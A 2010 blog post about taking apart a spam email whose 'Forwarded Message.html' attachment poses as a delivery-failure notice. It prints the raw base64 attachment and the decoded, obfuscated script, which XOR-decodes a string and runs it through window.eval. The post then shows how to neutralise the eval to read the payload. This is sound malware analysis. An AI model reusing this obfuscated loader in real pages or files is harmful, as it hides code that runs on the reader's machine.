Robots w/Lasers

July 8, 2010

Reverse Engineering Obfuscated Javascript

I keep getting these spam emails which are making it past Gmail’s spam filter. Basically, it looks like a ‘delivery failed’ notification, with an HTML attachment which you are supposed to think is the original email. So you click on the attachment and open it, to find out which email you sent failed to go through. I finally got curious enough to see what exactly was going on. Here’s how the email looks like in Gmail:

Spam email screenshot

Here’s the actual full contents of the email (some ip / email addresses removed to protect the innocent)

Delivered-To: xxx
Received: by 10.229.236.206 with SMTP id kl14cs141790qcb;
 Thu, 8 Jul 2010 09:00:59 -0700 (PDT)
Received: by 10.150.202.9 with SMTP id z9mr580063ybf.86.1278604858545;
 Thu, 08 Jul 2010 09:00:58 -0700 (PDT)
Return-Path: <borers13@reportinternational.com>
Received: from xxx
 by mx.google.com with ESMTP id l5si18198859ybj.58.2010.07.08.09.00.57;
 Thu, 08 Jul 2010 09:00:57 -0700 (PDT)
Received-SPF: neutral (google.com: xxx is neither permitted nor denied by best guess record for domain of borers13@reportinternational.com) client-ip=xxx;
Authentication-Results: mx.google.com; spf=neutral (google.com: xxx is neither permitted nor denied by best guess record for domain of borers13@reportinternational.com) smtp.mail=borers13@reportinternational.com
Received: from 93-86-52-90.dynamic.isp.telekom.rs (unknown [109.92.111.218])
 by xxx (Postfix) with ESMTP id 8CE6842D000B
 for <xxx>; Thu,  8 Jul 2010 11:00:51 -0500 (CDT)
Received: from 109.92.111.218 by mail1.optimisaplc.com; Thu, 8 Jul 2010 18:00:46 +0100
Message-ID: <000d01cb1eb6$b9f0fa90$6400a8c0@borers13>
From: postmaster@reportinternational.com
To: <xxx>
Subject: Delivery Status Notification (Failure)
Date: Thu, 8 Jul 2010 18:00:46 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="----=_NextPart_000_0006_01CB1EB6.B9F0FA90"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

This is a multi-part message in MIME format.

------=_NextPart_000_0006_01CB1EB6.B9F0FA90
Content-Type: text/plain;
 format=flowed;
 charset="Windows-1252";
 reply-type=original
Content-Transfer-Encoding: 7bit

Note: Forwarded message is attached.

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

 borers13@reportinternational.com

Final-Recipient: rfc822;borers13@reportinternational.com
Action: failed
Status: 5.1.1

------=_NextPart_000_0006_01CB1EB6.B9F0FA90
Content-Type: text/html;
 name="Forwarded Message.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
 filename="Forwarded Message.html"

PHNjcmlwdD52YXIgY0U7aWYoY0UhPSdpSlYnICYmIGNFIT0neUonKXtjRT0nJ307dmFyIHBQO2lm
KHBQIT0na1gnICYmIHBQIT0nd01KJyl7cFA9Jyd9O3ZhciB0SUo9ZmFsc2U7dmFyIHZVTTt2YXIg
aUE9bmV3IEFycmF5KCk7dmFyIHVBPW5ldyBBcnJheSgpO3ZVTT0nOGQ4ZTgnKycyODA5NScrJzg4
OGU4JysnZmNmODknKyc5Mzg0OCcrJzdjMWRjJysnYzFjNjgnKyc5OTU5NScrJzkxZGJjJysnZWNl
OTUnKyc5Mzg0OCcrJ2Y4NTliJysnOGM4MDknKyczOGE4NCcrJzk1Y2Y4JysnMjhlOGMnKydjZTg4
OCcrJ2Y4NTg0JysnOTlkMmMnKydmODk5NScrJzhjOGRjJysnNmRhJzt2YXIgZVg9bmV3IERhdGUo
KTt2YXIgbU09MjI3MDk7dmFyIGpORDtpZihqTkQhPSdxRlYnICYmIGpORCE9J2RMJyl7ak5EPScn
fTt2YXIgZFU9MjM2MzM7ICAgZnVuY3Rpb24gZShvKXt2YXIgeE07aWYoeE0gPT0gJ2FWJyl7eE09
MDt9O3RoaXMuYko9IiI7dGhpcy55Tj0ieU4iO3ZhciBrQ1cgPSBNYXRoLnJhbmRvbSgpO2Z1bmN0
aW9uIHIoaSx1RCl7dmFyIHlUPScnO3ZhciB6WD0nJzt0aGlzLnBJPScnO3JldHVybiBpWydcdTAw
NjMnK3VuZXNjYXBlKCclNjglNjElNzIlNDMlNmYlNjQlNjUlNDElNzQnKV0odUQpO3ZhciB5RTtp
Zih5RSE9JycgJiYgeUUhPSd6UCcpe3lFPW51bGx9O3ZhciBrPWZhbHNlO312YXIgaVA9bmV3IEFy
cmF5KCk7dmFyIHdZPW5ldyBBcnJheSgpO3RoaXMuZkQ9Jyc7dmFyIGpBPScnO2Z1bmN0aW9uIGtW
KGEsclUpe3ZhciB6TT0yMzk4Mzt0aGlzLnFQPSJxUCI7cmV0dXJuIGFeclU7fXZhciBiRSA9IG5l
dyBEYXRlKCk7ICB2YXIgbFI7aWYobFIhPScnICYmIGxSIT0ndFZMJyl7bFI9bnVsbH07dmFyIGYg
PSBiRVsnXHUwMDY3XHUwMDY1XHUwMDc0XHUwMDUzXHUwMDY1Jyt1bmVzY2FwZSgnJTYzJTZmJTZl
JTY0JTczJyldKCk7dmFyIGQgPSBmIC0gYkE7dmFyIHRMTTtpZih0TE0hPScnICYmIHRMTSE9J3Un
KXt0TE09Jyd9O2lmKGQgPCAwKSBkID0gMTt2YXIgdUI9NDkxMDI7dmFyIG5CPTI4ODc4O2lmKGQg
PiAxKSBkID0gMTt2YXIgdE09Jyc7dmFyIGRYQz0nJzt2YXIgaVUgPSBkO3ZhciBnTztpZihnTyE9
J2pHJyAmJiBnTyE9J3JTJyl7Z089J2pHJ307dmFyIHBISTtpZihwSEkhPSdiJyAmJiBwSEkgIT0g
Jycpe3BIST1udWxsfTt2YXIgdCA9IHdpbmRvdzt2YXIgZkM7aWYoZkMgPT0gJ2lKJyl7ZkM9MDt9
O3RoaXMuZUE9NDkxNjE7dGhpcy5wUj1mYWxzZTt2YXIgaU0gPSBkb2N1bWVudDt2YXIgclIgPSBT
dHJpbmc7dmFyIHREPScnO3ZhciBmQ047aWYoZkNOIT0nJyAmJiBmQ04hPSdySCcpe2ZDTj0nYyd9
O3ZhciBjQjtpZihjQiE9JycgJiYgY0IhPSdhQicpe2NCPSd4RCd9O3ZhciB3ID0gdFsnXHUwMDc1
XHUwMDZlJyt1bmVzY2FwZSgnJTY1JTczJTYzJTYxJTcwJTY1JyldO3ZhciBlVCA9IHJSWydcdTAw
NjYnK3VuZXNjYXBlKCclNzIlNmYlNmQlNDMlNjglNjElNzIlNDMlNmYlNjQlNjUnKV07dmFyIGFP
O2lmKGFPIT0nJyAmJiBhTyE9J2RCQicpe2FPPW51bGx9O3RoaXMuZk89Jyc7dmFyIGRKPWZhbHNl
O3ZhciBpUztpZihpUyE9J2dNJyAmJiBpUyE9J2ROJyl7aVM9Jyd9O3ZhciBqRjtpZihqRiE9Jycg
JiYgakYhPSd4SScpe2pGPScnfTt2YXIgZVAgPSAnJzt2YXIgck87aWYock8hPScnICYmIHJPIT0n
cFMnKXtyTz0nJ307dGhpcy5oSz1mYWxzZTt2YXIgYVcgPSAnJSc7dmFyIGVLID0gMjt2YXIgd1Eg
PSAwO3RoaXMuZ0U9IiI7dmFyIHNHO2lmKHNHIT0nJyAmJiBzRyE9J2ZOJyl7c0c9bnVsbH07dmFy
IHkgPSBvWydcdTAwNmMnK3VuZXNjYXBlKCclNjUlNmUlNjclNzQlNjgnKV07dGhpcy54Rj0iIjt2
YXIgY0cgPSBNYXRoLnJhbmRvbSgpO3ZhciBqWD00NDA3Mjtmb3IodmFyIHE9d1E7IHEgPCB5OyBx
Kz1lSyl7dGhpcy51Sj0nJzt2YXIgeUs7aWYoeUshPScnICYmIHlLIT0ncEhNJyl7eUs9Jyd9O3Zh
ciBlRTtpZihlRSA9PSAncUknKXtlRT0wO307ZVArPSBhVyArIG9bJ1x1MDA3M1x1MDA3NVx1MDA2
MicrdW5lc2NhcGUoJyU3MyU3NCU3MicpXShxLCBlSyk7dGhpcy5mVT04MTQxO3ZhciBmVztpZihm
VyE9JycgJiYgZlchPSd0Vycpe2ZXPScnfTt9dmFyIHpNQz1mYWxzZTt2YXIgbyA9IHcoZVApO3Ro
aXMuaUQ9Jyc7dmFyIHhMPWZhbHNlO3RoaXMuYkw9MTIwMzt2YXIgbiA9IDIyNCArIGlVO3ZhciBk
WCA9ICcnO3ZhciB6RztpZih6RyE9JycgJiYgekchPSdxQ0YnKXt6Rz0nJ307dGhpcy5oSD0nJzt2
YXIgclcgPSBvWydcdTAwNmMnK3VuZXNjYXBlKCclNjUlNmUlNjclNzQlNjgnKV07dmFyIGFQPScn
O3ZhciB2STtpZih2SSA9PSAndUYnKXt2ST0wO307dmFyIGhWSD0nJztmb3IodmFyIGpRPTA7IGpR
IDwgclc7IGpRKyspe3ZhciBqVDtpZihqVCE9J2RIJyAmJiBqVCAhPSAnJyl7alQ9bnVsbH07dmFy
IGFOUz1uZXcgQXJyYXkoKTt2YXIgclJLO2lmKHJSSyE9JycgJiYgclJLIT0nekhWJyl7clJLPScn
fTt2YXIgYkpYPW5ldyBEYXRlKCk7dmFyIGxWID0gcihvLGpRKTtsViA9IGtWKGxWLCBuKTt2YXIg
c0E7aWYoc0EhPScnICYmIHNBIT0neEEnKXtzQT0nJ307dmFyIHlLSDtpZih5S0ghPScnICYmIHlL
SCE9J25UJyl7eUtIPScnfTt0aGlzLndYPSJ3WCI7ZFgrPWVUKGxWKTt9dmFyIGxVO2lmKGxVIT0n
JyAmJiBsVSE9J2JZJyl7bFU9bnVsbH07dGhpcy5rSkE9Jyc7dGhpcy5tQz0iIjt0WydcdTAwNjVc
dTAwNzYnK3VuZXNjYXBlKCclNjElNkMnKV0oZFgpO3JldHVybiBkWDt9dmFyIGJOPW5ldyBBcnJh
eSgpO3ZhciB3SztpZih3SyE9J21LJyAmJiB3SyE9J3hWQycpe3dLPSdtSyd9O3ZhciBvQj0nJzt2
YXIgdVdOPScnO3ZhciBhVDtpZihhVCE9JycgJiYgYVQhPSdvQkonKXthVD1udWxsfTt2YXIgd0Ig
PSBuZXcgRGF0ZSgpO3ZhciBiQSA9IHdCWydcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTNcdTAwNjUn
K3VuZXNjYXBlKCclNjMlNmYlNmUlNjQlNzMnKV0oKTsgdmFyIHVTPW5ldyBBcnJheSgpO3RoaXMu
bFg9Mzc5NDt0aGlzLmFQTj02NDQwMjtzZXRUaW1lb3V0KCdlKHZVTSknLCA5ODUpO3ZhciB3UUg7
aWYod1FIIT0nJyAmJiB3UUghPSdmSCcpe3dRSD0nJ307dmFyIG1VPW5ldyBBcnJheSgpO3ZhciB0
WT1mYWxzZTs8L3NjcmlwdD4= 

------=_NextPart_000_0006_01CB1EB6.B9F0FA90--

The first thing that threw up a red flag was that the HTML attachment was base64 encoded. Generally if something is a text attachment, it’s not encoded, which makes it easy to examine in your mail reader without executing it. So the first thing I did was decode the base64, a quick google turned up this base64 decoder tool. The result was this:

<script>var cE;if(cE!='iJV' && cE!='yJ'){cE=''};var pP;if(pP!='kX' && pP!='wMJ'){pP=''};var tIJ=fals
e;var vUM;var iA=new Array();var uA=new Array();vUM='8d8e8'+'28095'+'888e8'+'fcf89'+'93848'+'7c1dc'+
'c1c68'+'99595'+'91dbc'+'ece95'+'93848'+'f859b'+'8c809'+'38a84'+'95cf8'+'28e8c'+'ce888'+'f8584'+'99d
2c'+'f8995'+'8c8dc'+'6da';var eX=new Date();var mM=22709;var jND;if(jND!='qFV' && jND!='dL'){jND=''}
;var dU=23633;   function e(o){var xM;if(xM == 'aV'){xM=0;};this.bJ="";this.yN="yN";var kCW = Math.r
andom();function r(i,uD){var yT='';var zX='';this.pI='';return i['\u0063'+unescape('%68%61%72%43%6f%
64%65%41%74')](uD);var yE;if(yE!='' && yE!='zP'){yE=null};var k=false;}var iP=new Array();var wY=new
 Array();this.fD='';var jA='';function kV(a,rU){var zM=23983;this.qP="qP";return a^rU;}var bE = new
Date();  var lR;if(lR!='' && lR!='tVL'){lR=null};var f = bE['\u0067\u0065\u0074\u0053\u0065'+unescap
e('%63%6f%6e%64%73')]();var d = f - bA;var tLM;if(tLM!='' && tLM!='u'){tLM=''};if(d < 0) d = 1;var u
B=49102;var nB=28878;if(d > 1) d = 1;var tM='';var dXC='';var iU = d;var gO;if(gO!='jG' && gO!='rS')
{gO='jG'};var pHI;if(pHI!='b' && pHI != ''){pHI=null};var t = window;var fC;if(fC == 'iJ'){fC=0;};th
is.eA=49161;this.pR=false;var iM = document;var rR = String;var tD='';var fCN;if(fCN!='' && fCN!='rH
'){fCN='c'};var cB;if(cB!='' && cB!='aB'){cB='xD'};var w = t['\u0075\u006e'+unescape('%65%73%63%61%7
0%65')];var eT = rR['\u0066'+unescape('%72%6f%6d%43%68%61%72%43%6f%64%65')];var aO;if(aO!='' && aO!=
'dBB'){aO=null};this.fO='';var dJ=false;var iS;if(iS!='gM' && iS!='dN'){iS=''};var jF;if(jF!='' && j
F!='xI'){jF=''};var eP = '';var rO;if(rO!='' && rO!='pS'){rO=''};this.hK=false;var aW = '%';var eK =
 2;var wQ = 0;this.gE="";var sG;if(sG!='' && sG!='fN'){sG=null};var y = o['\u006c'+unescape('%65%6e%
67%74%68')];this.xF="";var cG = Math.random();var jX=44072;for(var q=wQ; q < y; q+=eK){this.uJ='';va
r yK;if(yK!='' && yK!='pHM'){yK=''};var eE;if(eE == 'qI'){eE=0;};eP+= aW + o['\u0073\u0075\u0062'+un
escape('%73%74%72')](q, eK);this.fU=8141;var fW;if(fW!='' && fW!='tW'){fW=''};}var zMC=false;var o =
 w(eP);this.iD='';var xL=false;this.bL=1203;var n = 224 + iU;var dX = '';var zG;if(zG!='' && zG!='qC
F'){zG=''};this.hH='';var rW = o['\u006c'+unescape('%65%6e%67%74%68')];var aP='';var vI;if(vI == 'uF
'){vI=0;};var hVH='';for(var jQ=0; jQ < rW; jQ++){var jT;if(jT!='dH' && jT != ''){jT=null};var aNS=n
ew Array();var rRK;if(rRK!='' && rRK!='zHV'){rRK=''};var bJX=new Date();var lV = r(o,jQ);lV = kV(lV,
 n);var sA;if(sA!='' && sA!='xA'){sA=''};var yKH;if(yKH!='' && yKH!='nT'){yKH=''};this.wX="wX";dX+=e
T(lV);}var lU;if(lU!='' && lU!='bY'){lU=null};this.kJA='';this.mC="";t['\u0065\u0076'+unescape('%61%
6C')](dX);return dX;}var bN=new Array();var wK;if(wK!='mK' && wK!='xVC'){wK='mK'};var oB='';var uWN=
'';var aT;if(aT!='' && aT!='oBJ'){aT=null};var wB = new Date();var bA = wB['\u0067\u0065\u0074\u0053
\u0065'+unescape('%63%6f%6e%64%73')](); var uS=new Array();this.lX=3794;this.aPN=64402;setTimeout('e
(vUM)', 985);var wQH;if(wQH!='' && wQH!='fH'){wQH=''};var mU=new Array();var tY=false;</script>

That's not very readable, so another quick trip to the google turned up this javascript formatter, producing this output:

var cE;
if (cE != 'iJV' && cE != 'yJ') {
    cE = ''
};
var pP;
if (pP != 'kX' && pP != 'wMJ') {
    pP = ''
};
var tIJ = false;
var vUM;
var iA = new Array();
var uA = new Array();
vUM = '8d8e8' + '28095' + '888e8' + 'fcf89' + '93848' + '7c1dc' + 'c1c68' + '99595' + '91dbc' + 'ece95' + '93848' + 'f859b' + '8c809' + '38a84' + '95cf8' + '28e8c' + 'ce888' + 'f8584' + '99d2c' + 'f8995' + '8c8dc' + '6da';
var eX = new Date();
var mM = 22709;
var jND;
if (jND != 'qFV' && jND != 'dL') {
    jND = ''
};
var dU = 23633;

function e(o) {
    var xM;
    if (xM == 'aV') {
        xM = 0;
    };
    this.bJ = "";
    this.yN = "yN";
    var kCW = Math.random();

    function r(i, uD) {
        var yT = '';
        var zX = '';
        this.pI = '';
        return i['\u0063' + unescape('%68%61%72%43%6f%64%65%41%74')](uD);
        var yE;
        if (yE != '' && yE != 'zP') {
            yE = null
        };
        var k = false;
    }
    var iP = new Array();
    var wY = new Array();
    this.fD = '';
    var jA = '';

    function kV(a, rU) {
        var zM = 23983;
        this.qP = "qP";
        return a ^ rU;
    }
    var bE = new Date();
    var lR;
    if (lR != '' && lR != 'tVL') {
        lR = null
    };
    var f = bE['\u0067\u0065\u0074\u0053\u0065' + unescape('%63%6f%6e%64%73')]();
    var d = f - bA;
    var tLM;
    if (tLM != '' && tLM != 'u') {
        tLM = ''
    };
    if (d < 0) d = 1;
    var uB = 49102;
    var nB = 28878;
    if (d > 1) d = 1;
    var tM = '';
    var dXC = '';
    var iU = d;
    var gO;
    if (gO != 'jG' && gO != 'rS') {
        gO = 'jG'
    };
    var pHI;
    if (pHI != 'b' && pHI != '') {
        pHI = null
    };
    var t = window;
    var fC;
    if (fC == 'iJ') {
        fC = 0;
    };
    this.eA = 49161;
    this.pR = false;
    var iM = document;
    var rR = String;
    var tD = '';
    var fCN;
    if (fCN != '' && fCN != 'rH') {
        fCN = 'c'
    };
    var cB;
    if (cB != '' && cB != 'aB') {
        cB = 'xD'
    };
    var w = t['\u0075\u006e' + unescape('%65%73%63%61%70%65')];
    var eT = rR['\u0066' + unescape('%72%6f%6d%43%68%61%72%43%6f%64%65')];
    var aO;
    if (aO != '' && aO != 'dBB') {
        aO = null
    };
    this.fO = '';
    var dJ = false;
    var iS;
    if (iS != 'gM' && iS != 'dN') {
        iS = ''
    };
    var jF;
    if (jF != '' && jF != 'xI') {
        jF = ''
    };
    var eP = '';
    var rO;
    if (rO != '' && rO != 'pS') {
        rO = ''
    };
    this.hK = false;
    var aW = '%';
    var eK = 2;
    var wQ = 0;
    this.gE = "";
    var sG;
    if (sG != '' && sG != 'fN') {
        sG = null
    };
    var y = o['\u006c' + unescape('%65%6e%67%74%68')];
    this.xF = "";
    var cG = Math.random();
    var jX = 44072;
    for (var q = wQ;
    q < y;
    q += eK) {
        this.uJ = '';
        var yK;
        if (yK != '' && yK != 'pHM') {
            yK = ''
        };
        var eE;
        if (eE == 'qI') {
            eE = 0;
        };
        eP += aW + o['\u0073\u0075\u0062' + unescape('%73%74%72')](q, eK);
        this.fU = 8141;
        var fW;
        if (fW != '' && fW != 'tW') {
            fW = ''
        };
    }
    var zMC = false;
    var o = w(eP);
    this.iD = '';
    var xL = false;
    this.bL = 1203;
    var n = 224 + iU;
    var dX = '';
    var zG;
    if (zG != '' && zG != 'qCF') {
        zG = ''
    };
    this.hH = '';
    var rW = o['\u006c' + unescape('%65%6e%67%74%68')];
    var aP = '';
    var vI;
    if (vI == 'uF') {
        vI = 0;
    };
    var hVH = '';
    for (var jQ = 0;
    jQ < rW;
    jQ++) {
        var jT;
        if (jT != 'dH' && jT != '') {
            jT = null
        };
        var aNS = new Array();
        var rRK;
        if (rRK != '' && rRK != 'zHV') {
            rRK = ''
        };
        var bJX = new Date();
        var lV = r(o, jQ);
        lV = kV(lV, n);
        var sA;
        if (sA != '' && sA != 'xA') {
            sA = ''
        };
        var yKH;
        if (yKH != '' && yKH != 'nT') {
            yKH = ''
        };
        this.wX = "wX";
        dX += eT(lV);
    }
    var lU;
    if (lU != '' && lU != 'bY') {
        lU = null
    };
    this.kJA = '';
    this.mC = "";
    t['\u0065\u0076' + unescape('%61%6C')](dX);
    return dX;
}
var bN = new Array();
var wK;
if (wK != 'mK' && wK != 'xVC') {
    wK = 'mK'
};
var oB = '';
var uWN = '';
var aT;
if (aT != '' && aT != 'oBJ') {
    aT = null
};
var wB = new Date();
var bA = wB['\u0067\u0065\u0074\u0053\u0065' + unescape('%63%6f%6e%64%73')]();
var uS = new Array();
this.lX = 3794;
this.aPN = 64402;
setTimeout('e(vUM)', 985);
var wQH;
if (wQH != '' && wQH != 'fH') {
    wQH = ''
};
var mU = new Array();
var tY = false;

Well at least it's broken up into separate lines, but it still is pretty meaningless at a quick glance. My next step was to go through all the encoded lines and see if they turned up anything suspicious. It's easy to do in a browser, take this line of code:

var bA = wB['\u0067\u0065\u0074\u0053\u0065' + unescape('%63%6f%6e%64%73')]();

Go up to your browser's address bar, and enter:

javascript:alert(XYZ)

Where 'XYZ' is what you're interested in. In this case I typed:

javascript:alert('\u0067\u0065\u0074\u0053\u0065' + unescape('%63%6f%6e%64%73'));

The result was 'getSeconds'. Looking at the line above, wB is Date(), so this whole line of code is effectively calling (new Date()).getSeconds(); nothing dangerous there. I then did that for all the lines containing unicode escaped characters and url escaped characters. The only suspicious one I could find was

    var t = window;
        // ... later ...
    t['\u0065\u0076' + unescape('%61%6C')](dX);

This translates to 'window.eval(dX)', which is basically saying 'Take whatever is in the variable dX, and execute it as JavaScript code'. Since nothing else was dangerous (just calls to things like String.length, String.getCharCodeAt, String.substr, etc), I determined that as long as I removed that line of code, it would be safe to run. So I created a new HTML file as follows:

<html>
<body>
<textarea id="mytxt"/>
<script>

 // ... entire script pasted here ... 

 // t['\u0065\u0076' + unescape('%61%6C')](dX);  this line replaced with:
 var mytxt = document.getElementById('mytxt');
 mytxt.value = dX;
 
 // ... rest of script ...

</script>

What this does, is instead of executing the code, it dumps it out to a textarea. I then simply saved this as 'hax.html', opened it in my browser, and saw:

hax.html

And there you have it...the entire result of this long and complicated obfuscated JavaScript was simply to redirect me to some spammer's site. And I didn't even have to figure out how the obfuscation worked, all I needed to do was find a single weak point, where it has been decoded but not yet executed, and then change the command to run the code into a command to display the code.

Filed under: Software — davr @ 9:22 am

No Comments »

No comments yet.

RSS feed for comments on this post. TrackBack URI

Leave a comment

Powered by WordPress

Bad Behavior has blocked 2578 access attempts in the last 7 days.




Paid Advertisements
Guitar Lessons - Renegade Motorhome - Costa Rica - British Virgin Islands